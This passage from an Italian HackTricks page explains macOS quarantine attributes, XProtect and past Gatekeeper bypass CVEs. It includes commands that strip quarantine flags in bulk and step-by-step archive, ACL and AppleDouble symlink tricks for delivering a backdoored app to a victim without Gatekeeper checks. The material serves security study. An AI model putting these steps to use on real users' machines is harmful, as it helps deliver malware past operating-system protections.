macOS Gatekeeper / Quarantine / XProtect

```c #include #include

enum qtn_flags { QTN_FLAG_DOWNLOAD = 0x0001, QTN_FLAG_SANDBOX = 0x0002, QTN_FLAG_HARD = 0x0004, QTN_FLAG_USER_APPROVED = 0x0040, };

#define qtn_proc_alloc _qtn_proc_alloc #define qtn_proc_apply_to_self _qtn_proc_apply_to_self #define qtn_proc_free _qtn_proc_free #define qtn_proc_init _qtn_proc_init #define qtn_proc_init_with_self _qtn_proc_init_with_self #define qtn_proc_set_flags _qtn_proc_set_flags #define qtn_file_alloc _qtn_file_alloc #define qtn_file_init_with_path _qtn_file_init_with_path #define qtn_file_free _qtn_file_free #define qtn_file_apply_to_path _qtn_file_apply_to_path #define qtn_file_set_flags _qtn_file_set_flags #define qtn_file_get_flags _qtn_file_get_flags #define qtn_proc_set_identifier _qtn_proc_set_identifier

typedef struct _qtn_proc *qtn_proc_t; typedef struct _qtn_file *qtn_file_t;

int qtn_proc_apply_to_self(qtn_proc_t); void qtn_proc_init(qtn_proc_t); int qtn_proc_init_with_self(qtn_proc_t); int qtn_proc_set_flags(qtn_proc_t, uint32_t flags); qtn_proc_t qtn_proc_alloc(); void qtn_proc_free(qtn_proc_t); qtn_file_t qtn_file_alloc(void); void qtn_file_free(qtn_file_t qf); int qtn_file_set_flags(qtn_file_t qf, uint32_t flags); uint32_t qtn_file_get_flags(qtn_file_t qf); int qtn_file_apply_to_path(qtn_file_t qf, const char *path); int qtn_file_init_with_path(qtn_file_t qf, const char path); int qtn_proc_set_identifier(qtn_proc_t qp, const char bundleid);

int main() {

qtn_proc_t qp = qtn_proc_alloc(); qtn_proc_set_identifier(qp, "xyz.hacktricks.qa"); qtn_proc_set_flags(qp, QTN_FLAG_DOWNLOAD | QTN_FLAG_USER_APPROVED); qtn_proc_apply_to_self(qp); qtn_proc_free(qp);

FILE *fp; fp = fopen("thisisquarantined.txt", "w+"); fprintf(fp, "Hello Quarantine\n"); fclose(fp);

return 0;

}

</details>

E **rimuovi** quell'attributo con:
```bash
xattr -d com.apple.quarantine portada.png
#You can also remove this attribute from every file with
find . -iname '*' -print0 | xargs -0 xattr -d com.apple.quarantine

E trova tutti i file in quarantena con:

find / -exec ls -ld {} \; 2>/dev/null | grep -E "[x\-]@ " | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.quarantine"

Le informazioni di quarantena sono anche memorizzate in un database centrale gestito da LaunchServices in ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2.

Quarantine.kext

L'estensione del kernel è disponibile solo attraverso la cache del kernel sul sistema; tuttavia, puoi scaricare il Kernel Debug Kit da https://developer.apple.com/, che conterrà una versione simbolicata dell'estensione.

XProtect

XProtect è una funzione di anti-malware integrata in macOS. XProtect controlla qualsiasi applicazione quando viene avviata per la prima volta o modificata rispetto al suo database di malware noti e tipi di file non sicuri. Quando scarichi un file tramite alcune app, come Safari, Mail o Messaggi, XProtect scansiona automaticamente il file. Se corrisponde a un malware noto nel suo database, XProtect impedirà l'esecuzione del file e ti avviserà della minaccia.

Il database di XProtect è aggiornato regolarmente da Apple con nuove definizioni di malware, e questi aggiornamenti vengono scaricati e installati automaticamente sul tuo Mac. Questo assicura che XProtect sia sempre aggiornato con le ultime minacce conosciute.

Tuttavia, vale la pena notare che XProtect non è una soluzione antivirus completa. Controlla solo un elenco specifico di minacce note e non esegue scansioni on-access come la maggior parte dei software antivirus.

Puoi ottenere informazioni sull'ultimo aggiornamento di XProtect eseguendo:

system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5

XProtect si trova in una posizione protetta da SIP in /Library/Apple/System/Library/CoreServices/XProtect.bundle e all'interno del bundle puoi trovare informazioni che XProtect utilizza:

• XProtect.bundle/Contents/Resources/LegacyEntitlementAllowlist.plist: Consente al codice con quei cdhash di utilizzare diritti legacy.

• XProtect.bundle/Contents/Resources/XProtect.meta.plist: Elenco di plugin ed estensioni che non sono autorizzati a caricarsi tramite BundleID e TeamID o che indicano una versione minima.

• XProtect.bundle/Contents/Resources/XProtect.yara: Regole Yara per rilevare malware.

• XProtect.bundle/Contents/Resources/gk.db: Database SQLite3 con hash delle applicazioni bloccate e TeamIDs.

Nota che c'è un'altra app in /Library/Apple/System/Library/CoreServices/XProtect.app relativa a XProtect che non è coinvolta nel processo di Gatekeeper.

Non Gatekeeper

Nota che Gatekeeper non viene eseguito ogni volta che esegui un'applicazione, solo AppleMobileFileIntegrity (AMFI) verificherà le firme del codice eseguibile quando esegui un'app che è già stata eseguita e verificata da Gatekeeper.

Pertanto, in precedenza era possibile eseguire un'app per memorizzarla nella cache con Gatekeeper, quindi modificare file non eseguibili dell'applicazione (come file Electron asar o NIB) e se non erano in atto altre protezioni, l'applicazione veniva eseguita con le modifiche maligne.

Tuttavia, ora questo non è più possibile perché macOS impedisce di modificare i file all'interno dei bundle delle applicazioni. Quindi, se provi l'attacco Dirty NIB, scoprirai che non è più possibile abusarne perché dopo aver eseguito l'app per memorizzarla nella cache con Gatekeeper, non sarai in grado di modificare il bundle. E se cambi, ad esempio, il nome della directory Contents in NotCon (come indicato nell'exploit), e poi esegui il binario principale dell'app per memorizzarla nella cache con Gatekeeper, si verificherà un errore e non verrà eseguito.

Bypass di Gatekeeper

Qualsiasi modo per bypassare Gatekeeper (riuscire a far scaricare qualcosa all'utente ed eseguirlo quando Gatekeeper dovrebbe impedirlo) è considerato una vulnerabilità in macOS. Questi sono alcuni CVE assegnati a tecniche che hanno consentito di bypassare Gatekeeper in passato:

CVE-2021-1810

È stato osservato che se si utilizza Archive Utility per l'estrazione, i file con percorsi superiori a 886 caratteri non ricevono l'attributo esteso com.apple.quarantine. Questa situazione consente involontariamente a quei file di eludere i controlli di sicurezza di Gatekeeper.

Controlla il rapporto originale per ulteriori informazioni.

CVE-2021-30990

Quando un'applicazione viene creata con Automator, le informazioni su ciò di cui ha bisogno per eseguire si trovano in application.app/Contents/document.wflow e non nell'eseguibile. L'eseguibile è solo un binario generico di Automator chiamato Automator Application Stub.

Pertanto, potresti far sì che application.app/Contents/MacOS/Automator\ Application\ Stub punti con un link simbolico a un altro Automator Application Stub all'interno del sistema e eseguirà ciò che si trova in document.wflow (il tuo script) senza attivare Gatekeeper perché l'effettivo eseguibile non ha l'attributo di quarantena xattr.

Esempio di posizione attesa: /System/Library/CoreServices/Automator\ Application\ Stub.app/Contents/MacOS/Automator\ Application\ Stub

Controlla il rapporto originale per ulteriori informazioni.

CVE-2022-22616

In questo bypass è stato creato un file zip con un'applicazione che inizia a comprimere da application.app/Contents invece di application.app. Pertanto, l'attributo di quarantena è stato applicato a tutti i file di application.app/Contents ma non a application.app, che era ciò che Gatekeeper stava controllando, quindi Gatekeeper è stato bypassato perché quando application.app è stato attivato non aveva l'attributo di quarantena.

zip -r test.app/Contents test.zip

Check the original report for more information.

CVE-2022-32910

Anche se i componenti sono diversi, lo sfruttamento di questa vulnerabilità è molto simile a quello precedente. In questo caso genereremo un Apple Archive da application.app/Contents in modo che application.app non riceva l'attributo di quarantena quando viene decompresso da Archive Utility.

aa archive -d test.app/Contents -o test.app.aar

Controlla il report originale per ulteriori informazioni.

CVE-2022-42821

L'ACL writeextattr può essere utilizzata per impedire a chiunque di scrivere un attributo in un file:

touch /tmp/no-attr
chmod +a "everyone deny writeextattr" /tmp/no-attr
xattr -w attrname vale /tmp/no-attr
xattr: [Errno 13] Permission denied: '/tmp/no-attr'

Inoltre, il formato di file AppleDouble copia un file includendo i suoi ACE.

Nel codice sorgente è possibile vedere che la rappresentazione testuale dell'ACL memorizzata all'interno dell'xattr chiamato com.apple.acl.text verrà impostata come ACL nel file decompresso. Quindi, se hai compresso un'applicazione in un file zip con il formato di file AppleDouble con un ACL che impedisce ad altri xattr di essere scritti su di esso... l'xattr di quarantena non è stato impostato nell'applicazione:

chmod +a "everyone deny write,writeattr,writeextattr" /tmp/test
ditto -c -k test test.zip
python3 -m http.server
# Download the zip from the browser and decompress it, the file should be without a quarantine xattr

Controlla il report originale per ulteriori informazioni.

Nota che questo potrebbe essere sfruttato anche con AppleArchives:

mkdir app
touch app/test
chmod +a "everyone deny write,writeattr,writeextattr" app/test
aa archive -d app -o test.aar

CVE-2023-27943

È stato scoperto che Google Chrome non impostava l'attributo di quarantena ai file scaricati a causa di alcuni problemi interni di macOS.

CVE-2023-27951

I formati di file AppleDouble memorizzano gli attributi di un file in un file separato che inizia con ._, questo aiuta a copiare gli attributi dei file tra le macchine macOS. Tuttavia, è stato notato che dopo aver decompresso un file AppleDouble, il file che inizia con ._ non riceveva l'attributo di quarantena.

mkdir test
echo a > test/a
echo b > test/b
echo ._a > test/._a
aa archive -d test/ -o test.aar

# If you downloaded the resulting test.aar and decompress it, the file test/._a won't have a quarantitne attribute

Essere in grado di creare un file che non avrà l'attributo di quarantena impostato, era possibile bypassare Gatekeeper. Il trucco era creare un'applicazione file DMG utilizzando la convenzione di denominazione AppleDouble (iniziarlo con ._) e creare un file visibile come un link simbolico a questo file nascosto senza l'attributo di quarantena. Quando il file dmg viene eseguito, poiché non ha un attributo di quarantena, bypasserà Gatekeeper.

# Create an app bundle with the backdoor an call it app.app

echo "[+] creating disk image with app"
hdiutil create -srcfolder app.app app.dmg

echo "[+] creating directory and files"
mkdir
mkdir -p s/app
cp app.dmg s/app/._app.dmg
ln -s ._app.dmg s/app/app.dmg

echo "[+] compressing files"
aa archive -d s/ -o app.aar

uchg (da questo talk)

• Crea una directory contenente un'app.

• Aggiungi uchg all'app.

• Comprimi l'app in un file tar.gz.

• Invia il file tar.gz a una vittima.

• La vittima apre il file tar.gz ed esegue l'app.

• Gatekeeper non controlla l'app.

Prevenire il xattr di quarantena

In un pacchetto ".app" se il xattr di quarantena non è aggiunto, durante l'esecuzione Gatekeeper non verrà attivato.

Impara e pratica il hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica il hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)